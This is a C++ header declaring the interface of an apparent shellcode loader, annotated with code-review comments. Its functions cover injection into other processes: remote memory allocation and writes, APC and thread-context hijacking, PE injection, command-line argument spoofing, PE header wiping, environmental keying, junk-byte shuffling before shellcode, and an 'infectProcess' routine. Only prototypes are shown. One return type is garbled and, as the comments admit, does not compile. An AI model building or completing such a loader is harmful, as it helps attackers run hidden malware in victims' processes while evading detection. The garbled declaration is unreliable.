#pragma once
#include "commons.h"
/////////////////////////////////////////////////////
// Declarations for the process-creation / remote-memory / remote-execution
// primitives used by the launcher. Only prototypes live here; the definitions
// (and therefore the real behaviour, error handling and handle lifetimes) are
// in the matching .cpp, so each note below states what the signature shows
// and hedges anything beyond that.
//
// Names used here but not declared in this file -- the technique enums
// (AllocationTechnique, WriteTechnique, ExecutionTechnique, PEInjectTechnique),
// the enumerators useLocal / useNtWriteVirtualMemory, and the Win32 types
// (HANDLE, DWORD, BOOL, PVOID, LPBYTE, PROCESS_INFORMATION, _EXCEPTION_POINTERS)
// plus std::wstring / std::vector -- are presumably pulled in by commons.h;
// verify if this header is ever included on its own.
//
// NOTE(review): the conventions are uneven across this API and callers must
// not assume neighbouring functions agree:
//   - "the thread" is a HANDLE in queueApcThread*/createRemoteThread but a
//     DWORD in setContextThread;
//   - byte counts are DWORD in readProcMemory but size_t everywhere else,
//     so a size_t count passed to readProcMemory is silently truncated on
//     64-bit builds;
//   - results are bool in most places, BOOL in writeProcMemory, and several
//     routines that can fail (createRemoteThread, rtlCreateUserThread,
//     queueApcThread*, setContextThread, peInject) return void, so their
//     failure is not observable from the return value;
//   - the two void*-returning allocators/readers do not state who owns the
//     returned memory or in which process it is valid.
// None of that can be fixed in this header alone without also changing the
// definitions, so it is recorded here rather than altered.

// Per its name, prepares the child described by pinfo for injection.
// skipEnvChecks defaults to false; which checks it skips is defined in the .cpp.
bool infectProcess(PROCESS_INFORMATION* pinfo, bool skipEnvChecks = false);

// Creates a child process from `command` and returns its PROCESS_INFORMATION.
// stdoutHandle defaults to INVALID_HANDLE_VALUE (presumably "no redirection").
// The hProcess/hThread handles in the returned struct are the caller's to
// close -- it is not stated here whether postExecute does so; confirm.
PROCESS_INFORMATION spawnChildProcess(
    const std::wstring& command,
    HANDLE stdoutHandle = INVALID_HANDLE_VALUE
);

// Post-execution step for hProcess; what it does (cleanup? handle close?) is
// only visible in the definition.
bool postExecute(HANDLE hProcess);

// Per its name, overwrites PE header bytes in `process`. No result is returned,
// so a failed write is not reported to the caller.
void wipeProcessHeaders(HANDLE process);

// Allocates `size` bytes with page protection `protection` using `technique`.
// The returned void* is presumably an address inside the target (pinfo)
// process, not a local pointer -- do not dereference it locally; confirm in
// the .cpp. alertableThread is an optional out-parameter (NULL to ignore);
// whether the caller must close a handle written there is not stated.
void* allocateRemote(
    PROCESS_INFORMATION *pinfo,
    AllocationTechnique technique,
    size_t size,
    DWORD protection,
    HANDLE* alertableThread = NULL
);

// Maps sectionHandle into processHandle, apparently copying `size` bytes from
// buf, with protection `protection`. The mapped address is returned through
// ptrToAlloc (out-parameter, must be non-null). Returns false on failure.
bool mapViewOfSection(
    HANDLE processHandle,
    HANDLE sectionHandle,
    uint8_t *buf,
    size_t size,
    DWORD protection,
    uint8_t** ptrToAlloc
);

// Rewrites the command line seen for hProcess to fakeCommandLine; imagePath
// is the image it should appear to belong to. fakeCommandLine is a non-const
// wchar_t*, so the declaration does not promise the buffer is left untouched
// -- pass a writable buffer, not a string literal. (The top-level const on
// hProcess has no effect on the signature.)
bool processArgumentSpoofing(
    const HANDLE hProcess,
    const std::wstring& imagePath,
    wchar_t* fakeCommandLine
);

// Injects the PE image in buf (bufsize bytes) into the pinfo process using
// `technique`. Returns nothing, so failure must be detected some other way.
void peInject(
    uint8_t* buf,
    size_t bufsize,
    PEInjectTechnique technique,
    PROCESS_INFORMATION *pinfo
);

// Starts execution at `alloc` in the pinfo process using execTech. allocTech
// and writeTech default to useLocal / useNtWriteVirtualMemory; why an
// execution step needs the allocation and write techniques is only visible
// in the definition (presumably to know how `alloc` was produced).
bool executeRemotely(
    PROCESS_INFORMATION *pinfo,
    void* alloc,
    ExecutionTechnique execTech,
    AllocationTechnique allocTech = useLocal,
    WriteTechnique writeTech = useNtWriteVirtualMemory
);

// Splits `bytes` bytes of `data`, destined for `address`, into chunks.
// NOTE(review): the element type of the returned vector did not survive
// extraction -- the text reads `std::vector>>`, i.e. at least two nested
// template arguments were lost. It is likely a vector of (address, chunk)
// pairs, but that must be confirmed against the .cpp; the line as written
// does not compile.
std::vector>> fragmentShellcode(
    size_t bytes,
    void* address,
    void* data
);

// Full allocate/write/execute pipeline for _buf (bufsize bytes) into the
// pinfo process with explicit techniques. Returns false on failure.
bool launchHelper(
    AllocationTechnique allocTech,
    WriteTechnique writeTech,
    ExecutionTechnique execTech,
    uint8_t *_buf,
    size_t bufsize,
    PROCESS_INFORMATION* pinfo
);

// Top-level entry: launches _buf (bufsize bytes). pinfo defaults to nullptr;
// presumably the .cpp then spawns/selects a target itself -- confirm.
// Note _buf is void* here but uint8_t* in launchHelper.
bool launch(
    void* _buf,
    size_t bufsize,
    PROCESS_INFORMATION* pinfo = nullptr
);

// Reads `bytes` bytes at `address` from `process` and returns a pointer to
// the copy. Ownership of the returned buffer (and how to free it) is not
// declared -- check the .cpp before calling this in a loop. `bytes` is DWORD,
// unlike the size_t used by writeProcMemory (see header note).
void* readProcMemory(
    HANDLE process,
    void *address,
    DWORD bytes
);

// Writes `bytes` bytes from `data` to `address` in `process`. Returns Win32
// BOOL (not bool) -- test with `!= FALSE`, not `== true`. `data` is
// non-const although the call presumably only reads it.
BOOL writeProcMemory(
    HANDLE process,
    void *address,
    void *data,
    size_t bytes
);

// Redirects a window message procedure in the pinfo process to `address`
// (per its name), using the given allocation/write techniques. No result.
void overwriteMessageProcedureHandler(
    PROCESS_INFORMATION *pinfo,
    AllocationTechnique allocTech,
    WriteTechnique writeTech,
    void *address
);

// Creates a thread at `address` in `process`, optionally suspended. The new
// thread's handle is not returned, so the caller cannot wait on or resume it
// through this API.
void createRemoteThread(
    HANDLE process,
    void* address,
    bool suspended = false
);

// Same intent as createRemoteThread via a different primitive. NOTE the
// parameter order is (address, process) here but (process, address) above;
// both are pointer-sized, so a swapped call will not be caught at compile time.
void rtlCreateUserThread(
    void* address,
    HANDLE remoteProcess
);

// Queues an APC at `address` on remoteThread with up to three arguments.
// suspendThread defaults to true. dontCloseHandle defaulting to false
// suggests the callee closes remoteThread unless told otherwise -- so the
// caller should treat its handle as consumed by default; confirm in the .cpp.
void queueApcThread(
    void* address,
    HANDLE remoteThread,
    PVOID arg1 = NULL,
    PVOID arg2 = NULL,
    PVOID arg3 = NULL,
    bool suspendThread = true,
    bool dontCloseHandle = false
);

// Single-argument variant of queueApcThread (arg1 has no default here).
// Same suspend/handle-ownership flags as above.
void queueApcThread1(
    void* address,
    HANDLE remoteThread,
    PVOID arg1,
    bool suspendThread = true,
    bool dontCloseHandle = false
);

// Hijacks the thread identified by remoteThread to run `address`. Unlike the
// APC routines this takes a DWORD -- presumably a thread id rather than a
// handle. pThread is an optional out-parameter, apparently for the handle
// the routine opens; alreadySuspended lets the caller skip suspension;
// dontCloseHandle follows the same convention as queueApcThread.
void setContextThread(
    void* address,
    DWORD remoteThread,
    HANDLE *pThread = NULL,
    bool alreadySuspended = false,
    bool dontCloseHandle = false
);

// Creates a local thread at `address`; `suspended` has no default here.
void createThread(
    void* address,
    bool suspended
);

// Thread entry point used with the local-thread path; lpParameter semantics
// are defined in the .cpp.
DWORD WINAPI threadProc(
    void* lpParameter
);

// Pre-execution gate; returns false to abort, presumably.
bool preExecute();

// Transfers control to `address` in the current process (per its name).
void jumpToShellcode(
    void* address
);

// Environment/safety gate consulted before launching; what it checks is
// defined in the .cpp.
bool checkIfSafeToLaunch();

// Allocation via an APC-driven HeapCreate in the pinfo process (per its name).
// Same out-parameter and return conventions as allocateRemote: the returned
// void* is presumably a remote address, and alertableThread may be NULL.
void* queueApcHeapCreate(
    PROCESS_INFORMATION* pinfo,
    size_t bufsize,
    DWORD protection,
    HANDLE *alertableThread = NULL
);

// Top-level unhandled-exception filter installed by the launcher
// (SetUnhandledExceptionFilter-compatible signature).
LONG WINAPI PoloniumUnhandledExceptionFilter(
    _In_ struct _EXCEPTION_POINTERS *ExceptionInfo
);

// Environmental keying check; returns false if the environment does not match.
// (The name's spelling -- "Environmetal" -- is part of the public API and is
// left as is; fixing it requires touching every caller and the definition.)
bool processEnvironmetalKeying();

// Shuffles the junk bytes that precede the shellcode in `buffer` (per its
// name). buffer defaults to nullptr; what is used in that case is only
// visible in the definition.
void permutateJunkBytesPrependingShellcode(LPBYTE buffer = nullptr);